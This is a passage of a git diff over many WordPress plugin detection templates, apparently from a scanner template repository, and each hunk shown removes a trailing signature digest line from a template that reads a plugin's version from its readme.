4b0a00483046022100872b14e0020e73997ba8a1235247795c57b6343c41b5227ac4c0fcb0eeca61b8022100d03911c4b0670ad3497426281d6c7d2671b06885322052bb5c0303aed1a9d85f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 0a22bbf5ea..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d5b4329a011ce5ccbbe41f0da0ead9c1f87a57e82ca8f76685e4d0fd9d990942022100bbafaa5a437b3095925aadf5791a18c22f1aa21ab520bc0d90ca00cc36bc1086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index d110ea3aee..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e1eef951c37ea75f70b5eeb2586d7171b32a9d5cfa9f28380252a89de810e39022002c7ad818c1c3993a4765610e8342f6e9e3bf8b49cb21415d5c4d9b3cf404eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6606197153..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100caf40b8c208f43d7d0a772ea017d7a89fd5db691f4306cb03a302be255f381e802210091c67aa5f24345aebbd5efcb173d9a4cb696b16fabe874e3d307936ab0b5bac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b2d59b1a20..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013cfff7b2d20f298f8c39b51e8dd323f58dcc503a0491d5bd72916dee808b35a02204a7e8588dfb8c657703671b6bdb129fa7e130fc04a57fa7c974a2c6c63c60885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 04c7dfae46..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab9d7e3332c3271069c5ed442682b3a3c613eedb360b34d760eb9d387a2c31a9022100ecb73f30b7eb51b710f2661c5380688a60f4aa8ab3c12c2033f53e2228a2bb39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index c0304fe8d1..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf964678eeffe0ab3986606ce64b7254a1f5a602ee98f6bfabaa0b5b85b73dcd022100d7c562547904d62948f976705361fb06e72fcf55cf680884920fe7b275774eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 9933e0e54b..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023fb4bbbfdf8dbbef7ba3f6361d6f5469b21aa78bc5c3b8e15cc36f75710a100022025665ace8f21a360d7bb123ca83e0c16469bf19592f8d8e770be4f29dd3cfa9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 7f5992295a..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220730c0745c66ccd562cc3483d17a7a65262a730e7f24caf3af1c640833052b3fe02210093afe268c932847e5c59fc8477b7a74e001379159f60b2c393aa17cbd0ab62cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 219c43dabe..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100def846a7f93b7da735d4c19720218fd19e04de5fa2dd177eff14061ed86bcdb5022064e18e9ac4f3db5376486732b48304b0f0a6e88df003e9903ae14bab10ac0b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index ed5dc0d5af..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009dc4669d0419df1f880090e0f1cdb309ebb986d25f52f3efb2851a603b916da202210098c5f85830e4eb8b58d4ac6cd46cbedc3ff41aa6f22e409e4d70582fbd076386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 0c83f21057..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7471ab75a3494c1b8215e6b8c5030b8b5cad6b59e9916fcfe66ca4b83056a84022100e56eedc2a09142969b7eb146a5f7a5db6baaffdd00294981cfe1b5a8699dabc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 105dd2356f..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210080c7cfc2e7629ef8d0386d3b3d5b881e93d5b0182f1bc163761a55925b339a4e022100ea77751e3db4bd2b1a39b783941642c389408baef981cd663b15235fe89ff638:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 388cbff25a..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d75bf1a8d9b02ef4576f4803ae8292db8f5944e093b48c8480b290ff0cd6076022100dba41bd4ba6986054bb29f3f2dbf274a4283450c8465b2111734b3a1f3066497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 198e1163e4..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d26c83fc51a3dddf8a2daeea72f22b1d82e0afcc9ad9346a4dbaed911986199b022100ce2cbbd494c4ec69ade40ace246fcf552a042cd1614ccc1e1604801852bdffa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index e2bf8b3260..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220402a0f1de5e87e76f56b3a70d8d582e493a708a702444f658ebd1aebb9bd6890022100d385d89b54b013d7f85f9229260900d833a8fab4e331703576e01132ab1a5a3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index f06541f699..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220324cae64e6802a948e37cdf72f8b6b03f3bcd739db5902ddaab9ade9159979c4022022d91768dd41f56e82be14796e6c14d12c4fef9cf60d3e4a29211965996218f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index bfe58ec366..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206997656ce4ef806e47d7cfa49ec4a168bbb14719b3c0b62641bc8e533b32755f022100d807dfdd703eeee7011003b8fb1f1b1b246b302905f3c66924ed8a4e426c5ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index cd41ecfa53..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204e2f6fa8d25fb47b295b6d8e7c0f3de812fe2e3322c7b60b0d5de84c7f7752c102206d1c0ae3c77b428fe9132ee83f63ba0d5f49265c60f56923c1729cb3be571d98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 62ea9cafa4..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0e959a0846adb82293fccfabb1a0595f8d04e8712bac443795b80af37802c540220166b41b089b0f19d87be68612617b6d91e46d19a009bd5fabcd483c9f33dba54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 401c27db6d..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100925cd8f02843b73cbe943690a7644c5408787b345bcc527c63854758a86c140a022100d779764ce0df3cd99515d14633319def94008875743fcfe275b2af5c0dbcc04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index d5a974d5b9..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022074d346dc51e8c9b72d0c002b0487244b8a13a1da1cb2b8cebca252a84317088e022100d1ffb2dea89a027dfc56b49317f1c46312305b6ff072ca16f72f1c0df7bbbbe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 67727882c1..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050b1f076c1d027d861cb4a9b816acf92dddae80ad31767ecff6b1e2fff2b2fc60220478e88fa4aaf1f3a1eefa915b86c6960eea977f631f1180926e034e506274bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8f260ffa47..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206cb0b60dea28fc6d98d3e84c66627e12d2ebbe7f8d35632bde792f6708156e42022073e943f88ee0aef0dc24fc5f6e296b75e4eb9402a2d1a2916224e8f02cfdcdae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index e946b5e7a1..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200f4d3cc3f325823d2f552dfc7c1e334d87684b040afcc6db4f629042ac5f1242022100b7d94e251896cfaac1bf440d519dba623946d2c23436de024051fc02c4e68a4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 5e5b666991..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f01970414536598fd02882897e709776d786cd594380520f63dee038cb4a86b0022100afc8d08f576decbf214e92895a0a71eaf5f0c71e229906671b7aef82b9648a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index f66febcbee..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204705ff0e2fd523d0307eb2e6f4fba1638d0f7f5ebc2c4a5a88ea5f3097aea8cc02206fe1d64a39373108ebebbcf5be2ee74a85ba64e166ff73e3dcee4bb5b01b9063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index c318505f64..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8ff6f44f65332d2d4d4627e74a7e68565048d5867424d86308a2337a454ca79022100d66bfe9f2f5b923628529f37275918bb4399c22e96435e3542d84566b2a39739:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 03cb698ed8..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e8dfa3ce5ea32b75e680e11515a8d788c8b0ffc7b25ffc49745963d0ffa702e1022100b98d7d569be204f188f4e5c10716c2c127392e7864167da72d49539087aab211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 884d053fa8..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202c4bffc82d34053f425137be3f58a1ce2bfbac3cbd8fe8901714ddbad0b1dec90220684685c2c2cf005809dd6c8bf490940c73703b63c8e4ad5f66b3d00eac239111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index aacb6cce0b..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022067c3038b61827f05c268049fb1d643382c4df8007f40ef6d4040f696d086729e02200e11dfac55ebcdd2d5a08fe4325765e37363cc040f9e0f6ee5af730295a2543b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index a327518260..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220606a401425033c8177d07c2ac4d55eb6479684f537b01053a28c1e875b4b6a42022059f4743c432b9a7b5fe5b7d55ae57fe0bf5ae339ba7fed9c8a18ba7e0286f969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7a8805ffd8..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e38cb26964e8150402d572fad32aa795ed5ac5072112ea8f38a1dacbfab5f09d02206fdb29c6eca42f83f57689bb71ff68dd6680e0bb40fb847cf596e8f40dbca9b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 1d2feb1145..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f55788225c60a6e7a39a2c2171acd1cb13ff58b2dc76780f004463b7427b74e02201f585cc3f392cc55694d8a53661df888a23d214ef75bf59c2c61c47834c641d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 2272a737d3..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220022499a5e10dba8af89691be9797b3e57b94b5dffa07b4e44018fc7967b3d26e022052d0cde1f95f114bacfd766b352a52943fbdf66d078edc10ff73489e61abcfe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3ef22479c4..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053cd70b73584d6590939c73dcbf66bc3af428ed47d4bcde6d172bd3752345c2902204ec71a740f86ecb2c915ce2122acc8247f4ce12f6ac54d9df0f2d3645f6d757f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 85f095c1be..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022011019f79d385ffebdc44b9c4ecb5f0bb878628612e3ab3c37a39e417500fb8b402210082844480b3678a688f31943aba00a9506e515f51840dc54c62305f7835143058:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 40ca4fb06b..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022070b5293a1e8d811661f8f8e79de3d3a1991b4d516e99e0b20ed54f50dd1790b1022100ebff72879f9a1f3928e1cabc75a0d46042244409c54fe2dc4d162dd5883e7d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index a346b34837..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aee5675b17f7ffc50a8741ab42e39e3137bcedd07aa84c93cebba8d6ef748ecf022100b213ddeb2c3bbe8fd194c8642a543d9613ffebccfb7dd66e76f3f54644cf1fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index a62375a683..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220268c92fcfcc2937a6d692b63e4535c4dbcc453441a9d395ee72cd0b80277b2b302203fc17e0b74aa7676c50b3c87a37faadf8b645ab9fb0e7af3c8d4c9b766cadac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index a3a0894168..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061123fb4a15d025a5a1efbda97bf2ce72e8b5b605b3b9017610a9db60f7fa1fb022100f893e43f59625890bcad78a812319f9981f15f0b18fe68fb03dc987ccabee6f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 186c97cc38..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7c297066bb903fc2b3ae3b49bfddbb25256d6cf65186a322a9c98fb1b7d5779022033eb9c53a932eb6eadff602493f410a33305d988fc5e9a2b6b01088372b60929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 4a5c32ea9d..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202938e359fe8da926ec8533d5be6d14a7619f5e8cadbbde1a9f11308bc4548d7c0220490835f9b249138b32455e869e1efdafbdd36179ba3c1db3366959dc87bd4413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index d4a9389590..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e4a7ac83006f709a584a44ab37948be2763f04638112364473036b17733dbc26022100cd9cac2d82aca82be0c86929a820569c470ee27ee734b27065c0ab3506840f9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index b5e4c6c4dc..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd9b9a2ec7b39f4565e82893040c591e6eadbeb4783f13ef6ba5dd0ae1e97118022013631d339d338720d09ba637435b1fb866edec44384b854dc1fad402b1c1d0dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 96f4da8033..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220467412b446b3d9652eab6f6418816b7672d3325552bc1e17c7bfd2f95f465ebe02202bd7e897e3bf3f3486ab67594e1697edb5f3a51626baba0855c2356292cb2919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index cc68cf0fbe..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ea9a6680248e01a68e00908985de5fc915a805cfe53cf10be357290330f4d2d3022100d3349d6e62189564b6f3c31c7aa1764e258913a7ebc1df2633b528200c8d2e86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 341ecdb99f..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 